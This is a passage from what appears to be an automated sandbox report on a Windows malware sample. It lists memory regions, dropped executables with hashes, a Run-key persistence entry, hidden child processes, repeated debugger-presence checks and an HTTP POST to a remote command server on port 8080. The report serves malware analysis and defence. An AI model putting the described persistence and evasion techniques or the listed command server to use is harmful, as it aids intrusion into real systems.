private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory Readable, Writable True True False
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory Readable, Writable True True False
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe 92.00 KB (94208 bytes) MD5: 2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc
SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1
False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 64.00 KB (65536 bytes) MD5: e56a6538abf1d60544ce14111c423323
SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b
SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da
False
c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes) MD5: e8289ca60a86329fef2726ababd2b99a
SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d
SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de
False
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes) MD5: 4d32b3456316311c50d77f7a37556236
SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861
SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6
False
Host Behavior
File (6)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe type = size True 1
Fn
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe size = 94208 True 1
Fn
Data
Registry (2)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe os_pid = 0xbdc, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (71)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load winhttp.dll base_address = 0x71a10000 True 7
Fn
Load urlmon.dll base_address = 0x76f00000 True 8
Fn
Load wininet.dll base_address = 0x77040000 True 8
Fn
Load advapi32.dll base_address = 0x764f0000 True 1
Fn
Load ole32.dll base_address = 0x77140000 True 1
Fn
Load shell32.dll base_address = 0x758a0000 True 1
Fn
Load crypt32.dll base_address = 0x755b0000 True 1
Fn
Load userenv.dll base_address = 0x74af0000 True 1
Fn
Load wtsapi32.dll base_address = 0x74180000 True 1
Fn
Get Handle c:\users\bgc6u8~1\appdata\local\temp\42753.exe base_address = 0x400000 True 1
Fn
Get Filename c:\users\bgc6u8~1\appdata\local\temp\42753.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 True 3
Fn
Get Address c:\windows\system32\user32.dll function = GetMessagePos, address_out = 0x768c6703 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = VirtualAlloc, address_out = 0x765e2fb6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x765d3ea8 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetCommandLineA, address_out = 0x765e98ff True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = LoadLibraryA, address_out = 0x765e395c True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = cos, address_out = 0x772e7400 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = sin, address_out = 0x772d41c0 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (22)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 91853 True 1
Fn
Get Time type = Ticks, time = 92867 True 1
Fn
Get Time type = Ticks, time = 93865 True 1
Fn
Get Time type = Ticks, time = 94864 True 1
Fn
Get Time type = Ticks, time = 95862 True 1
Fn
Get Time type = Ticks, time = 96861 True 1
Fn
Get Time type = Ticks, time = 97859 True 1
Fn
Get Time type = Ticks, time = 98857 True 1
Fn
Get Time type = Ticks, time = 99856 True 1
Fn
Get Time type = Ticks, time = 100901 True 1
Fn
Get Time type = Ticks, time = 101119 True 1
Fn
Get Time type = Ticks, time = 101915 True 1
Fn
Get Time type = Ticks, time = 102945 True 1
Fn
Get Time type = Ticks, time = 103927 True 1
Fn
Get Time type = Ticks, time = 104926 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 2
Fn
Get Info type = Operating System False 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Debug (499)
+
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe True 499
Fn
Network Behavior
HTTP Sessions (1)
+
Information Value
Total Data Sent 0.32 KB (330 bytes)
Total Data Received 60.59 KB (62044 bytes)
Contacted Host Count 1
Contacted Hosts 74.208.155.175
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 74.208.155.175
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 60.59 KB (62044 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 74.208.155.175, server_port = 8080, user_name = 0, password = 0 True 1
Fn
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = 0 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Read Response size = 62036, size_out = 62036 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session True 1
Fn
Process #8: ekgeobhbhtp7rxmh.exe
(Host: 40, Network: 0)
+
Information Value
ID #8
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:17
OS Process Information
+
Information Value
PID 0xbdc
Parent PID 0xb04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BE0
0x BE4
0x BE8
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory Readable, Writable True True False
pagefile_0x00000000000e0000 0x000e0000 0x001a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001e0000 0x001e0fff Memory Mapped File Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00300000 0x0035bfff Memory Mapped File Readable False False False
private_0x0000000000300000 0x00300000 0x00323fff Private Memory Readable, Writable True True False
private_0x0000000000300000 0x00300000 0x00311fff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x0032cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000330000 0x00330000 0x00330fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x00348fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x00351fff Private Memory Readable, Writable True True False
private_0x0000000000350000 0x00350000 0x00373fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00371fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00388fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x0038cfff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory Readable, Writable True True False
pagefile_0x00000000004b0000 0x004b0000 0x005b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005c0000 0x005c0000 0x009b2fff Pagefile Backed Memory Readable True False False
private_0x00000000009c0000 0x009c0000 0x00abffff Private Memory Readable, Writable True True False
private_0x00000000009c0000 0x009c0000 0x00a07fff Private Memory Readable, Writable True True False
private_0x0000000000a10000 0x00a10000 0x00a57fff Private Memory Readable, Writable True True False
private_0x0000000000a80000 0x00a80000 0x00abffff Private Memory Readable, Writable True True False
private_0x0000000000b90000 0x00b90000 0x00b9ffff Private Memory Readable, Writable True True False
ekgeobhbhtp7rxmh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001bd0000 0x01bd0000 0x01ccffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01e4ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001e50000 0x01e50000 0x01f2efff Pagefile Backed Memory Readable True False False
private_0x0000000001f30000 0x01f30000 0x0202ffff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd3000 0x7ffd3000 0x7ffd3fff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
+
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Fn
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe os_pid = 0xbec, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Fn
Module (33)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe base_address = 0xc40000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef63c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef65c True 1
Fn
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Fn
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Fn
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 1
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Mutex (1)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MB66D4A35 True 1
Fn
Process #9: ekgeobhbhtp7rxmh.exe
(Host: 72, Network: 0)
+
Information Value
ID #9
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:10, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
+
Information Value
PID 0xbec
Parent PID 0xbdc (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BF0
0x BF4
0x BF8
0x BFC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True True False
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory Readable, Writable True True False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x00300000 0x00300fff Memory Mapped File Readable False False False
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000310000 0x00310000 0x00311fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00320000 0x0037bfff Memory Mapped File Readable False False False
private_0x0000000000320000 0x00320000 0x00343fff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x00331fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x0034cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000350000 0x00350000 0x00350fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00368fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00371fff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x00393fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00391fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003affff Private Memory Readable, Writable True True False
pagefile_0x00000000003b0000 0x003b0000 0x00477fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000480000 0x00480000 0x00580fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000590000 0x00590000 0x00982fff Pagefile Backed Memory Readable True False False
private_0x0000000000990000 0x00990000 0x00aeffff Private Memory Readable, Writable True True False
